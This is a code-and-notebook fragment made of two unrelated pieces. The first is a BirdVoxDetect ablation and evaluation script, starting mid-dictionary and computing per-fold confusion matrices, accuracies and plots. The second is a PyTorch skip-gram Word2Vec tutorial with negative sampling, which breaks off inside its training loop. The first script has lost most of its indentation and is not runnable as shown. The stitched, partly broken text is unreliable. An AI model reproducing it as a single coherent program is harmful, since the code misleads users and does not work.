"pcen-addntt-convnet_aug-all-but-noise":"GDA -> PCEN -> AT + MoE ",
}
reference_val_accs = model_val_accs[ablation_reference_name]
ablation_val_accs = [
100 * (reference_val_accs - model_val_accs[name]) / (100 - reference_val_accs)
for name in ablation_names]
ablation_names = list(reversed([ablation_names[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))
ablation_val_accs = list(reversed([ablation_val_accs[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))
ablation_val_accs = np.array(ablation_val_accs)
plt.rcdefaults()
fig, ax = plt.subplots(figsize=(7, 4))
plt.grid(linestyle="--")
plt.axvline(0.0, linestyle="--", color="#009900")
plt.plot([0.0], [1+len(ablation_val_accs)], 'd',
color="#009900", markersize=10.0)
colors = [
"#CB0003", # RED
"#E67300", # ORANGE
"#990099", # PURPLE
"#0000B2", # BLUE
"#009900", # GREEN
# '#008888', # TURQUOISE
# '#888800', # KAKI
'#555555', # GREY
]
for i, color in enumerate(colors):
plt.plot(np.array(ablation_val_accs[:,i]),
range(1, 1+len(ablation_val_accs[:,i])), 'o', color=color)
fig.canvas.draw()
plt.boxplot(ablation_val_accs.T, 0, 'rs', 0,
whis=100000)
plt.setp(ax.get_yticklabels(), family="serif")
ax.set_yticklabels(reversed([
"BirdVoxDetect",
"adaptive threshold\nreplaced by\n mixture of experts",
"no data augmentation",
"addition of noise\nto frontend but not to\nauxiliary features",
"no context adaptation",
"PCEN\nreplaced by\nlog-mel frontend",
"previous state of the art [57]"]))
ax.set_yticks(range(1, 2+len(ablation_val_accs)))
#ax.set_yticklabels([ytick_dict[x] for x in
# (ablation_names + [ablation_reference_name])], family="monospace")
plt.gca().invert_xaxis()
plt.gca().invert_yaxis()
ax.set_xlabel('Relative difference in validation miss rate (%)', family="serif")
plt.ylim([0.5, 1.5+len(ablation_names)])
#plt.show()
reference_test_accs = model_test_accs[ablation_reference_name]
print(reference_test_accs)
baseline_test_accs = model_test_accs["icassp-convnet_aug-all"]
print(baseline_test_accs)
plt.savefig('fig_ablation-study.eps', bbox_inches="tight")
plt.savefig('fig_ablation-study.svg', bbox_inches="tight")
plt.savefig('fig_ablation-study.png', bbox_inches="tight", dpi=1000)
n_trials = 10
report = {}
for model_name in model_names:
model_dir = os.path.join(models_dir, model_name)
# Initialize dictionaries
model_report = {
"validation": {},
"test_cv-acc_th=0.5": {}
}
# Initialize matrix of validation accuracies.
val_accs = np.zeros((n_units, n_trials))
val_tps = np.zeros((n_units, n_trials))
val_tns = np.zeros((n_units, n_trials))
val_fps = np.zeros((n_units, n_trials))
val_fns = np.zeros((n_units, n_trials))
test_accs = np.zeros((n_units, n_trials))
test_tps = np.zeros((n_units, n_trials))
test_tns = np.zeros((n_units, n_trials))
test_fps = np.zeros((n_units, n_trials))
test_fns = np.zeros((n_units, n_trials))
# Loop over test units.
for test_unit_id, test_unit_str in enumerate(units):
# Define directory for test unit.
test_unit_dir = os.path.join(model_dir, test_unit_str)
# Retrieve fold such that unit_str is in the test set.
folds = localmodule.fold_units()
fold = [f for f in folds if test_unit_str in f[0]][0]
test_units = fold[0]
validation_units = fold[2]
# Loop over trials.
for trial_id in range(n_trials):
# Define directory for trial.
trial_str = "trial-" + str(trial_id)
trial_dir = os.path.join(test_unit_dir, trial_str)
# Initialize.
break_switch = False
val_fn = 0
val_fp = 0
val_tn = 0
val_tp = 0
# Loop over validation units.
for val_unit_str in validation_units:
predictions_name = "_".join([
dataset_name,
model_name,
"test-" + test_unit_str,
"trial-" + str(trial_id),
"predict-" + val_unit_str,
"clip-predictions.csv"
])
prediction_path = os.path.join(
trial_dir, predictions_name)
# Load prediction.
csv_file = pd.read_csv(prediction_path)
# Parse prediction.
if model_name == "icassp-convnet_aug-all":
y_pred = np.array(csv_file["Predicted probability"])
y_true = np.array(csv_file["Ground truth"])
elif model_name == "pcen-add-convnet_aug-all-but-noise":
with open(prediction_path, 'r') as f:
reader = csv.reader(f)
rows = list(reader)
rows = [",".join(row) for row in rows]
rows = rows[1:]
rows = "\n".join(rows)
# Parse rows with correct header.
df = pd.read_csv(StringIO(rows),
names=[
"Dataset",
"Test unit",
"Prediction unit",
"Timestamp",
"Center Freq (Hz)",
"Augmentation",
"Key",
"Ground truth",
"Predicted probability"])
y_pred = np.array(df["Predicted probability"])
y_true = np.array(df["Ground truth"])
# Threshold.
y_pred = (y_pred > 0.5).astype('int')
# Check that CSV file is not corrupted.
if len(y_pred) == 0:
break_switch = True
break
# Compute confusion matrix.
tn, fp, fn, tp = sklearn.metrics.confusion_matrix(
y_true, y_pred).ravel()
val_fn = val_fn + fn
val_fp = val_fp + fp
val_tn = val_tn + tn
val_tp = val_tp + tp
if not break_switch:
val_acc = (val_tn+val_tp) / (val_fn+val_fp+val_tn+val_tp)
else:
val_fn = 0
val_fp = 0
val_tn = 0
val_tp = 0
val_acc = 0.0
val_fns[test_unit_id, trial_id] = val_fn
val_fps[test_unit_id, trial_id] = val_fp
val_tns[test_unit_id, trial_id] = val_tn
val_tps[test_unit_id, trial_id] = val_tp
val_accs[test_unit_id, trial_id] = val_acc
# Initialize.
predictions_name = "_".join([
dataset_name,
model_name,
"test-" + test_unit_str,
"trial-" + str(trial_id),
"predict-" + test_unit_str,
"clip-predictions.csv"
])
prediction_path = os.path.join(
trial_dir, predictions_name)
with open(prediction_path, 'r') as f:
reader = csv.reader(f)
rows = list(reader)
rows = [",".join(row) for row in rows]
rows = rows[1:]
rows = "\n".join(rows)
# Parse rows with correct header.
df = pd.read_csv(StringIO(rows),
names=[
"Dataset",
"Test unit",
"Prediction unit",
"Timestamp",
"Center Freq (Hz)",
"Augmentation",
"Key",
"Ground truth",
"Predicted probability"])
y_pred = np.array(df["Predicted probability"])
y_pred = (y_pred > 0.5).astype('int')
y_true = np.array(df["Ground truth"])
# Check that CSV file is not corrupted.
if len(y_pred) == 0:
test_tn, test_fp, test_fn, test_tp = 0, 0, 0, 0
test_acc = 0.0
else:
# Load ground truth.
y_true = np.array(df["Ground truth"])
# Compute confusion matrix.
test_tn, test_fp, test_fn, test_tp =\
sklearn.metrics.confusion_matrix(
y_true, y_pred).ravel()
test_acc = (test_tn+test_tp) / (test_fn+test_fp+test_tn+test_tp)
test_fns[test_unit_id, trial_id] = test_fn
test_fps[test_unit_id, trial_id] = test_fp
test_tns[test_unit_id, trial_id] = test_tn
test_tps[test_unit_id, trial_id] = test_tp
test_accs[test_unit_id, trial_id] = test_acc
    model_report["validation"]["FN"] = val_fns
    model_report["validation"]["FP"] = val_fps
    model_report["validation"]["TN"] = val_tns
    model_report["validation"]["TP"] = val_tps
model_report["validation"]["accuracy"] = val_accs
best_trials = np.argsort(model_report["validation"]["accuracy"], axis=1)
model_report["validation"]["best_trials"] = best_trials
model_report["test_cv-acc_th=0.5"]["FN"] = test_fns
model_report["test_cv-acc_th=0.5"]["FP"] = test_fps
model_report["test_cv-acc_th=0.5"]["TN"] = test_tns
model_report["test_cv-acc_th=0.5"]["TP"] = test_tps
model_report["test_cv-acc_th=0.5"]["accuracy"] = test_accs
cv_accs = []
for eval_trial_id in range(5):
cv_fn = 0
cv_fp = 0
cv_tn = 0
cv_tp = 0
for test_unit_id, test_unit_str in enumerate(units):
best_trials = model_report["validation"]["best_trials"]
unit_best_trials = best_trials[test_unit_id, -5:]
unit_best_trials = sorted(unit_best_trials)
trial_id = unit_best_trials[eval_trial_id]
cv_fn = cv_fn + model_report["test_cv-acc_th=0.5"]["FN"][test_unit_id, trial_id]
cv_fp = cv_fp + model_report["test_cv-acc_th=0.5"]["FP"][test_unit_id, trial_id]
cv_tn = cv_tn + model_report["test_cv-acc_th=0.5"]["TN"][test_unit_id, trial_id]
cv_tp = cv_tp + model_report["test_cv-acc_th=0.5"]["TP"][test_unit_id, trial_id]
cv_acc = (cv_tn+cv_tp) / (cv_tn+cv_tp+cv_fn+cv_fp)
cv_accs.append(cv_acc)
model_report["test_cv-acc_th=0.5"]["global_acc"] = np.array(cv_accs)
report[model_name] = model_report
print(model_name, ": acc = {:5.2f}% ± {:3.1f}".format(
100*np.mean(report[model_name]['test_cv-acc_th=0.5']['global_acc']),
100*np.std(report[model_name]['test_cv-acc_th=0.5']['global_acc'])))
#print(report['icassp-convnet_aug-all']['test_cv-acc_th=0.5']['global_acc'])
#print(report['pcen-add-convnet_aug-all-but-noise']['test_cv-acc_th=0.5']['global_acc'])
list(report.keys())
icassp_accs = report['icassp-convnet_aug-all']['test_cv-acc_th=0.5']['global_acc']
print("ICASSP 2018: acc = {:5.2f}% ± {:3.1f}".format(100*np.mean(icassp_accs), 100*np.std(icassp_accs)))
spl_accs = report['pcen-add-convnet_aug-all-but-noise']['test_cv-acc_th=0.5']['global_acc']
print("SPL 2018: acc = {:5.2f}% ± {:3.1f}".format(100*np.mean(spl_accs), 100*np.std(spl_accs)))
n_trials = 5
model_name = "skm-cv"
model_dir = os.path.join(models_dir, model_name)
skm_fns = np.zeros((n_trials, n_units))
skm_fps = np.zeros((n_trials, n_units))
skm_tns = np.zeros((n_trials, n_units))
skm_tps = np.zeros((n_trials, n_units))
# Loop over trials.
for trial_id in range(n_trials):
# Loop over units.
for test_unit_id, test_unit_str in enumerate(units):
# Define path to predictions.
unit_dir = os.path.join(model_dir, test_unit_str)
trial_str = "trial-" + str(5 + trial_id)
trial_dir = os.path.join(unit_dir, trial_str)
predictions_name = "_".join([
dataset_name,
"skm-proba",
"test-" + test_unit_str,
trial_str,
"predict-" + test_unit_str,
"clip-predictions.csv"
])
predictions_path = os.path.join(trial_dir, predictions_name)
# Remove header, which has too few columns (hack).
with open(predictions_path, 'r') as f:
reader = csv.reader(f)
rows = list(reader)
rows = [",".join(row) for row in rows]
rows = rows[1:]
rows = "\n".join(rows)
# Parse rows with correct header.
df = pd.read_csv(StringIO(rows),
names=[
"Dataset",
"Test unit",
"Prediction unit",
"Timestamp",
"Center Freq (Hz)",
"Augmentation",
"Key",
"Ground truth",
"Predicted probability"])
# Extract y_pred and y_true.
y_pred = np.array((df["Predicted probability"] > 0.5)).astype("int")
y_true = np.array(df["Ground truth"])
# Compute confusion matrix.
test_tn, test_fp, test_fn, test_tp =\
sklearn.metrics.confusion_matrix(
y_true, y_pred).ravel()
skm_fns[trial_id, test_unit_id] = test_fn
skm_fps[trial_id, test_unit_id] = test_fp
skm_tns[trial_id, test_unit_id] = test_tn
skm_tps[trial_id, test_unit_id] = test_tp
total_skm_fns = np.sum(skm_fns[:, 1:], axis=1)
total_skm_fps = np.sum(skm_fps[:, 1:], axis=1)
total_skm_tns = np.sum(skm_tns[:, 1:], axis=1)
total_skm_tps = np.sum(skm_tps[:, 1:], axis=1)
total_skm_accs = (total_skm_tns+total_skm_tps) / (total_skm_fns+total_skm_fps+total_skm_tns+total_skm_tps)
print("SKM: acc = {:5.2f}% ± {:3.1f}".format(100*np.mean(total_skm_accs), 100*np.std(total_skm_accs)))
xticks = np.array([2.0, 5.0, 10.0, 20.0, 50.0])
lms_snr_accs = np.repeat([0.652], 5)
pcen_snr_accs = np.repeat([0.809], 5)
skm_accs = total_skm_accs
fig, ax = plt.subplots(figsize=(10, 3))
plt.rcdefaults()
plt.boxplot(np.log2(np.array([
100*(1-lms_snr_accs),
100*(1-pcen_snr_accs),
100*(1-skm_accs),
100*(1-icassp_accs),
100*(1-spl_accs)]).T), 0, 'rs', 0,
whis=100000, patch_artist=True, boxprops={"facecolor": "w"});
plt.xlim(np.log2(np.array([2.0, 50.0])))
plt.xticks(np.log2(xticks))
plt.gca().set_xticklabels([100 - x for x in xticks])
plt.setp(ax.get_yticklabels(), family="serif")
ax.set_yticklabels(["logmelspec-SNR", "PCEN-SNR", "PCA-SKM-CNN", "logmelspec-CNN", "BirdVoxDetect"],
family="serif")
plt.gca().invert_yaxis()
plt.gca().invert_xaxis()
plt.xlabel("Test accuracy (%)", family="serif")
plt.gca().yaxis.grid(color='k', linestyle='--', linewidth=1.0, alpha=0.25, which="major")
plt.gca().xaxis.grid(color='k', linestyle='--', linewidth=1.0, alpha=0.25, which="major")
plt.savefig('fig_per-fold-test.eps', bbox_inches="tight")
np.min(icassp_accs), np.max(icassp_accs)
np.min(spl_accs), np.max(spl_accs)
icassp_fold_accs = report['icassp-convnet_aug-all']['validation']["accuracy"]
spl_fold_accs = report['pcen-add-convnet_aug-all-but-noise']['validation']["accuracy"]
print(np.mean(np.max(icassp_fold_accs, axis=1)), np.mean(np.max(spl_fold_accs, axis=1)))
```
# Skip-gram Word2Vec
In this notebook, I'll lead you through using PyTorch to implement the [Word2Vec algorithm](https://en.wikipedia.org/wiki/Word2vec) using the skip-gram architecture. By implementing this, you'll learn about embedding words for use in natural language processing. This will come in handy when dealing with things like machine translation.
## Readings
Here are the resources I used to build this notebook. I suggest reading these either beforehand or while you're working on this material.
* A really good [conceptual overview](http://mccormickml.com/2016/04/19/word2vec-tutorial-the-skip-gram-model/) of Word2Vec from Chris McCormick
* [First Word2Vec paper](https://arxiv.org/pdf/1301.3781.pdf) from Mikolov et al.
* [Neural Information Processing Systems, paper](http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf) with improvements for Word2Vec also from Mikolov et al.
---
## Word embeddings
When you're dealing with words in text, you end up with tens of thousands of word classes to analyze; one for each word in a vocabulary. Trying to one-hot encode these words is massively inefficient because most values in a one-hot vector will be set to zero. So, the matrix multiplication that happens in between a one-hot input vector and a first, hidden layer will result in mostly zero-valued hidden outputs.
To solve this problem and greatly increase the efficiency of our networks, we use what are called **embeddings**. Embeddings are just a fully connected layer like you've seen before. We call this layer the embedding layer and the weights are embedding weights. We skip the multiplication into the embedding layer by instead directly grabbing the hidden layer values from the weight matrix. We can do this because the multiplication of a one-hot encoded vector with a matrix returns the row of the matrix corresponding to the index of the "on" input unit.
<img src='assets/lookup_matrix.png' width=50%>
Instead of doing the matrix multiplication, we use the weight matrix as a lookup table. We encode the words as integers, for example "heart" is encoded as 958, "mind" as 18094. Then to get hidden layer values for "heart", you just take the 958th row of the embedding matrix. This process is called an **embedding lookup** and the number of hidden units is the **embedding dimension**.
There is nothing magical going on here. The embedding lookup table is just a weight matrix. The embedding layer is just a hidden layer. The lookup is just a shortcut for the matrix multiplication. The lookup table is trained just like any weight matrix.
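The lookup-equals-multiplication equivalence is easy to verify with a tiny sketch (toy numbers, not the actual embedding matrix):

```python
import numpy as np

# Toy embedding matrix: vocabulary of 5 words, embedding dimension 3.
embedding = np.arange(15, dtype=float).reshape(5, 3)

# One-hot encode word index 2 and multiply through the layer.
one_hot = np.zeros(5)
one_hot[2] = 1.0
via_matmul = one_hot @ embedding

# Embedding lookup: just take row 2 of the weight matrix.
via_lookup = embedding[2]

print(np.allclose(via_matmul, via_lookup))  # True
```

The two results are identical, which is why frameworks implement the embedding layer as an indexed lookup rather than a matrix multiplication.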
Embeddings aren't only used for words of course. You can use them for any model where you have a massive number of classes. A particular type of model called **Word2Vec** uses the embedding layer to find vector representations of words that contain semantic meaning.
---
## Word2Vec
The Word2Vec algorithm finds much more efficient representations by finding vectors that represent the words. These vectors also contain semantic information about the words.
<img src="assets/context_drink.png" width=40%>
Words that show up in similar **contexts**, such as "coffee", "tea", and "water" will have vectors near each other. Different words will be further away from one another, and relationships can be represented by distance in vector space.
There are two architectures for implementing Word2Vec:
>* CBOW (Continuous Bag-Of-Words) and
* Skip-gram
<img src="assets/word2vec_architectures.png" width=60%>
In this implementation, we'll be using the **skip-gram architecture** with **negative sampling** because it performs better than CBOW and trains faster with negative sampling. Here, we pass in a word and try to predict the words surrounding it in the text. In this way, we can train the network to learn representations for words that show up in similar contexts.
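As a concrete illustration of the skip-gram setup, here is a toy sketch of the (input, context) training pairs it produces. This uses a hypothetical sentence and a fixed window of 2; the real implementation below samples the window size randomly.

```python
# Toy illustration of skip-gram training pairs (hypothetical sentence,
# fixed window of 2).
sentence = ["the", "quick", "brown", "fox", "jumps"]
window = 2

pairs = []
for i, center in enumerate(sentence):
    # Grab up to `window` words on each side of the center word.
    context = sentence[max(0, i - window):i] + sentence[i + 1:i + 1 + window]
    pairs.extend((center, c) for c in context)

print(pairs[:4])  # [('the', 'quick'), ('the', 'brown'), ('quick', 'the'), ('quick', 'brown')]
```

Each pair feeds the center word in as input with one of its neighbors as the target.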
---
## Loading Data
Next, we'll ask you to load in the data and place it in the `data` directory:
1. Load the [text8 dataset](https://s3.amazonaws.com/video.udacity-data.com/topher/2018/October/5bbe6499_text8/text8.zip); a file of cleaned up *Wikipedia article text* from Matt Mahoney.
2. Place that data in the `data` folder in the home directory.
3. Then you can extract it and delete the zip archive to save storage space.
After following these steps, you should have one file in your data directory: `data/text8`.
```
# read in the extracted text file
with open('data/text8') as f:
text = f.read()
# print out the first 100 characters
print(text[:100])
```
## Pre-processing
Here I'm fixing up the text to make training easier. This comes from the `utils.py` file. The `preprocess` function does a few things:
>* It converts any punctuation into tokens, so a period is changed to ` <PERIOD> `. In this data set, there aren't any periods, but it will help in other NLP problems.
* It removes all words that show up five or *fewer* times in the dataset. This will greatly reduce issues due to noise in the data and improve the quality of the vector representations.
* It returns a list of words in the text.
This may take a few seconds to run, since our text file is quite large. If you want to write your own functions for this stuff, go for it!
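The real `preprocess` lives in `utils.py` (not shown here), but the punctuation-tokenizing step it describes can be sketched roughly like this (hypothetical helper, with only a couple of the replacements):

```python
# A minimal sketch of the punctuation-tokenizing step (hypothetical helper;
# the actual implementation in utils.py handles more punctuation marks and
# also filters out rare words).
def tokenize_punct(text):
    text = text.lower()
    for ch, token in {'.': ' <PERIOD> ', ',': ' <COMMA> '}.items():
        text = text.replace(ch, token)
    return text.split()

print(tokenize_punct("Hello, world."))  # ['hello', '<COMMA>', 'world', '<PERIOD>']
```

Converting punctuation into named tokens keeps it from being glued onto neighboring words when the text is split on whitespace.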
```
import utils
# get list of words
words = utils.preprocess(text)
print(words[:30])
# print some stats about this word data
print("Total words in text: {}".format(len(words)))
print("Unique words: {}".format(len(set(words)))) # `set` removes any duplicate words
```
### Dictionaries
Next, I'm creating two dictionaries to convert words to integers and back again (integers to words). This is again done with a function in the `utils.py` file. `create_lookup_tables` takes in a list of words in a text and returns two dictionaries.
>* The integers are assigned in descending frequency order, so the most frequent word ("the") is given the integer 0 and the next most frequent is 1, and so on.
Once we have our dictionaries, the words are converted to integers and stored in the list `int_words`.
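Although `create_lookup_tables` itself lives in `utils.py` and isn't shown, a minimal sketch under the frequency-ordering assumption described above might look like:

```python
from collections import Counter

# Hypothetical sketch of create_lookup_tables: integers are assigned in
# descending frequency order, so the most frequent word gets 0.
def create_lookup_tables_sketch(words):
    sorted_vocab = [w for w, _ in Counter(words).most_common()]
    vocab_to_int = {w: i for i, w in enumerate(sorted_vocab)}
    int_to_vocab = {i: w for w, i in vocab_to_int.items()}
    return vocab_to_int, int_to_vocab

v2i, i2v = create_lookup_tables_sketch(["the", "cat", "the", "dog", "the", "cat"])
print(v2i["the"])  # 0
```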
```
vocab_to_int, int_to_vocab = utils.create_lookup_tables(words)
int_words = [vocab_to_int[word] for word in words]
print(int_words[:30])
```
## Subsampling
Words that show up often such as "the", "of", and "for" don't provide much context to the nearby words. If we discard some of them, we can remove some of the noise from our data and in return get faster training and better representations. This process is called subsampling by Mikolov. For each word $w_i$ in the training set, we'll discard it with probability given by
$$ P(w_i) = 1 - \sqrt{\frac{t}{f(w_i)}} $$
where $t$ is a threshold parameter and $f(w_i)$ is the frequency of word $w_i$ in the total dataset.
> Implement subsampling for the words in `int_words`. That is, go through `int_words` and discard each word given the probability $P(w_i)$ shown above. Note that $P(w_i)$ is the probability that a word is discarded. Assign the subsampled data to `train_words`.
```
from collections import Counter
import random
import numpy as np
threshold = 1e-5
word_counts = Counter(int_words)
#print(list(word_counts.items())[0]) # dictionary of int_words, how many times they appear
total_count = len(int_words)
freqs = {word: count/total_count for word, count in word_counts.items()}
p_drop = {word: 1 - np.sqrt(threshold/freqs[word]) for word in word_counts}
# discard some frequent words, according to the subsampling equation
# create a new list of words for training
train_words = [word for word in int_words if random.random() < (1 - p_drop[word])]
print(train_words[:30])
```
## Making batches
Now that our data is in good shape, we need to get it into the proper form to pass it into our network. With the skip-gram architecture, for each word in the text, we want to define a surrounding _context_ and grab all the words in a window around that word, with size $C$.
From [Mikolov et al.](https://arxiv.org/pdf/1301.3781.pdf):
"Since the more distant words are usually less related to the current word than those close to it, we give less weight to the distant words by sampling less from those words in our training examples... If we choose $C = 5$, for each training word we will select randomly a number $R$ in range $[ 1: C ]$, and then use $R$ words from history and $R$ words from the future of the current word as correct labels."
> **Exercise:** Implement a function `get_target` that receives a list of words, an index, and a window size, then returns a list of words in the window around the index. Make sure to use the algorithm described above, where you choose a random number of words to grab from the window.
Say we have an input list and we're interested in the token at idx=2, `741`:
```
[5233, 58, 741, 10571, 27349, 0, 15067, 58112, 3580, 58, 10712]
```
For `R=2`, `get_target` should return a list of four values:
```
[5233, 58, 10571, 27349]
```
```
def get_target(words, idx, window_size=5):
''' Get a list of words in a window around an index. '''
R = np.random.randint(1, window_size+1)
start = idx - R if (idx - R) > 0 else 0
stop = idx + R
target_words = words[start:idx] + words[idx+1:stop+1]
return list(target_words)
# test your code!
# run this cell multiple times to check for random window selection
int_text = [i for i in range(10)]
print('Input: ', int_text)
idx=5 # word index of interest
target = get_target(int_text, idx=idx, window_size=5)
print('Target: ', target) # you should get some indices around the idx
```
### Generating Batches
Here's a generator function that returns batches of input and target data for our model, using the `get_target` function from above. The idea is that it grabs `batch_size` words from a words list. Then for each of those batches, it gets the target words in a window.
```
def get_batches(words, batch_size, window_size=5):
''' Create a generator of word batches as a tuple (inputs, targets) '''
n_batches = len(words)//batch_size
# only full batches
words = words[:n_batches*batch_size]
for idx in range(0, len(words), batch_size):
x, y = [], []
batch = words[idx:idx+batch_size]
for ii in range(len(batch)):
batch_x = batch[ii]
batch_y = get_target(batch, ii, window_size)
y.extend(batch_y)
x.extend([batch_x]*len(batch_y))
yield x, y
int_text = [i for i in range(20)]
x,y = next(get_batches(int_text, batch_size=4, window_size=5))
print('x\n', x)
print('y\n', y)
```
---
## Validation
Here, I'm creating a function that will help us observe our model as it learns. We're going to choose a few common words and a few uncommon words. Then, we'll print out the closest words to them using the cosine similarity:
<img src="assets/two_vectors.png" width=30%>
$$
\mathrm{similarity} = \cos(\theta) = \frac{\vec{a} \cdot \vec{b}}{|\vec{a}||\vec{b}|}
$$
We can encode the validation words as vectors $\vec{a}$ using the embedding table, then calculate the similarity with each word vector $\vec{b}$ in the embedding table. With the similarities, we can print out the validation words and words in our embedding table semantically similar to those words. It's a nice way to check that our embedding table is grouping together words with similar semantic meanings.
```
def cosine_similarity(embedding, valid_size=16, valid_window=100, device='cpu'):
""" Returns the cosine similarity of validation words with words in the embedding matrix.
Here, embedding should be a PyTorch embedding module.
"""
# Here we're calculating the cosine similarity between some random words and
# our embedding vectors. With the similarities, we can look at what words are
# close to our random words.
# sim = (a . b) / |a||b|
embed_vectors = embedding.weight
# magnitude of embedding vectors, |b|
magnitudes = embed_vectors.pow(2).sum(dim=1).sqrt().unsqueeze(0)
# pick N words from our ranges (0,window) and (1000,1000+window). lower id implies more frequent
valid_examples = np.array(random.sample(range(valid_window), valid_size//2))
valid_examples = np.append(valid_examples,
random.sample(range(1000,1000+valid_window), valid_size//2))
valid_examples = torch.LongTensor(valid_examples).to(device)
valid_vectors = embedding(valid_examples)
similarities = torch.mm(valid_vectors, embed_vectors.t())/magnitudes
return valid_examples, similarities
```
---
# SkipGram model
Define and train the SkipGram model.
> You'll need to define an [embedding layer](https://pytorch.org/docs/stable/nn.html#embedding) and a final, softmax output layer.
An Embedding layer takes in a number of inputs, importantly:
* **num_embeddings** – the size of the dictionary of embeddings, or how many rows you'll want in the embedding weight matrix
* **embedding_dim** – the size of each embedding vector; the embedding dimension
Below is an approximate diagram of the general structure of our network.
<img src="assets/skip_gram_arch.png" width=60%>
>* The input words are passed in as batches of input word tokens.
* This will go into a hidden layer of linear units (our embedding layer).
* Then, finally into a softmax output layer.
We'll use the softmax layer to make a prediction about the context words by sampling, as usual.
---
## Negative Sampling
For every example we give the network, we train it using the output from the softmax layer. That means for each input, we're making very small changes to millions of weights even though we only have one true example. This makes training the network very inefficient. We can approximate the loss from the softmax layer by only updating a small subset of all the weights at once. We'll update the weights for the correct example, but only a small number of incorrect, or noise, examples. This is called ["negative sampling"](http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf).
There are two modifications we need to make. First, since we're not taking the softmax output over all the words, we're really only concerned with one output word at a time. Similar to how we use an embedding table to map the input word to the hidden layer, we can now use another embedding table to map the hidden layer to the output word. Now we have two embedding layers, one for input words and one for output words. Secondly, we use a modified loss function where we only care about the true example and a small subset of noise examples.
$$
- \large \log{\sigma\left(u_{w_O}\hspace{0.001em}^\top v_{w_I}\right)} -
\sum_i^N \mathbb{E}_{w_i \sim P_n(w)}\log{\sigma\left(-u_{w_i}\hspace{0.001em}^\top v_{w_I}\right)}
$$
This is a little complicated so I'll go through it bit by bit. $u_{w_O}\hspace{0.001em}^\top$ is the embedding vector for our "output" target word (transposed, that's the $^\top$ symbol) and $v_{w_I}$ is the embedding vector for the "input" word. Then the first term
$$\large \log{\sigma\left(u_{w_O}\hspace{0.001em}^\top v_{w_I}\right)}$$
says we take the log-sigmoid of the inner product of the output word vector and the input word vector. Now the second term, let's first look at
$$\large \sum_i^N \mathbb{E}_{w_i \sim P_n(w)}$$
This means we're going to take a sum over words $w_i$ drawn from a noise distribution $w_i \sim P_n(w)$. The noise distribution is basically our vocabulary of words that aren't in the context of our input word. In effect, we can randomly sample words from our vocabulary to get these words. $P_n(w)$ is an arbitrary probability distribution though, which means we get to decide how to weight the words that we're sampling. This could be a uniform distribution, where we sample all words with equal probability. Or it could be according to the frequency that each word shows up in our text corpus, the unigram distribution $U(w)$. The authors found the best distribution to be $U(w)^{3/4}$, empirically.
Finally, in
$$\large \log{\sigma\left(-u_{w_i}\hspace{0.001em}^\top v_{w_I}\right)},$$
we take the log-sigmoid of the negated inner product of a noise vector with the input vector.
<img src="assets/neg_sampling_loss.png" width=50%>
To give you an intuition for what we're doing here, remember that the sigmoid function returns a probability between 0 and 1. The first term in the loss pushes the probability that our network will predict the correct word $w_O$ towards 1. In the second term, since we are negating the sigmoid input, we're pushing the probabilities of the noise words towards 0.
```
import torch
from torch import nn
import torch.optim as optim
class SkipGramNeg(nn.Module):
def __init__(self, n_vocab, n_embed, noise_dist=None):
super().__init__()
self.n_vocab = n_vocab
self.n_embed = n_embed
self.noise_dist = noise_dist
# define embedding layers for input and output words
self.in_embed = nn.Embedding(n_vocab,n_embed)
self.out_embed = nn.Embedding(n_vocab,n_embed)
        # Initialize both embedding tables with a uniform distribution
        self.in_embed.weight.data.uniform_(-1, 1)
        self.out_embed.weight.data.uniform_(-1, 1)
def forward_input(self, input_words):
# return input vector embeddings
input_vector = self.in_embed(input_words)
return input_vector
def forward_output(self, output_words):
# return output vector embeddings
output_vector = self.out_embed(output_words)
return output_vector
def forward_noise(self, batch_size, n_samples):
""" Generate noise vectors with shape (batch_size, n_samples, n_embed)"""
if self.noise_dist is None:
# Sample words uniformly
noise_dist = torch.ones(self.n_vocab)
else:
noise_dist = self.noise_dist
# Sample words from our noise distribution
noise_words = torch.multinomial(noise_dist,
batch_size * n_samples,
replacement=True)
        device = "cuda" if self.out_embed.weight.is_cuda else "cpu"
noise_words = noise_words.to(device)
## TODO: get the noise embeddings
# reshape the embeddings so that they have dims (batch_size, n_samples, n_embed)
noise_vector = self.out_embed(noise_words)
noise_vector = noise_vector.view(batch_size, n_samples, self.n_embed)
return noise_vector
class NegativeSamplingLoss(nn.Module):
def __init__(self):
super().__init__()
def forward(self, input_vectors, output_vectors, noise_vectors):
batch_size, embed_size = input_vectors.shape
# Input vectors should be a batch of column vectors
input_vectors = input_vectors.view(batch_size, embed_size, 1)
# Output vectors should be a batch of row vectors
output_vectors = output_vectors.view(batch_size, 1, embed_size)
# bmm = batch matrix multiplication
# correct log-sigmoid loss
out_loss = torch.bmm(output_vectors, input_vectors).sigmoid().log()
out_loss = out_loss.squeeze()
# incorrect log-sigmoid loss
noise_loss = torch.bmm(noise_vectors.neg(), input_vectors).sigmoid().log()
noise_loss = noise_loss.squeeze().sum(1) # sum the losses over the sample of noise vectors
# negate and sum correct and noisy log-sigmoid losses
# return average batch loss
return -(out_loss + noise_loss).mean()
```
### Training
Below is our training loop, and I recommend that you train on GPU, if available.
```
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Get our noise distribution
# Using word frequencies calculated earlier in the notebook
word_freqs = np.array(sorted(freqs.values(), reverse=True))
unigram_dist = word_freqs/word_freqs.sum()
noise_dist = torch.from_numpy(unigram_dist**(0.75)/np.sum(unigram_dist**(0.75)))
# instantiating the model
embedding_dim = 300
model = SkipGramNeg(len(vocab_to_int), embedding_dim, noise_dist=noise_dist).to(device)
# using the loss that we defined
criterion = NegativeSamplingLoss()
optimizer = optim.Adam(model.parameters(), lr=0.003)
print_every = 1500
steps = 0
epochs = 3
# train for some number of epochs
for e in range(epochs):
# get our input, target batches
for input_words, target_words in get_batches(train_words, 512):
steps += 1
inputs, targets = torch.LongTensor(input_words), torch.LongTensor(target_words)
inputs, targets = inputs.to(device), targets.to(device)
        # input, output, and noise vectors
input_vectors = model.forward_input(inputs)
output_vectors = model.forward_output(targets)
noise_vectors = model.forward_noise(inputs.shape[0], 5)
# negative sampling loss
loss = criterion(input_vectors, output_vectors, noise_vectors)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# loss stats
if steps % print_every == 0:
print("Epoch: {}/{}".format(e+1, epochs))
print("Loss: ", loss.item()) # avg batch loss at this point in training
valid_examples, valid_similarities = cosine_similarity(model.in_embed, device=device)
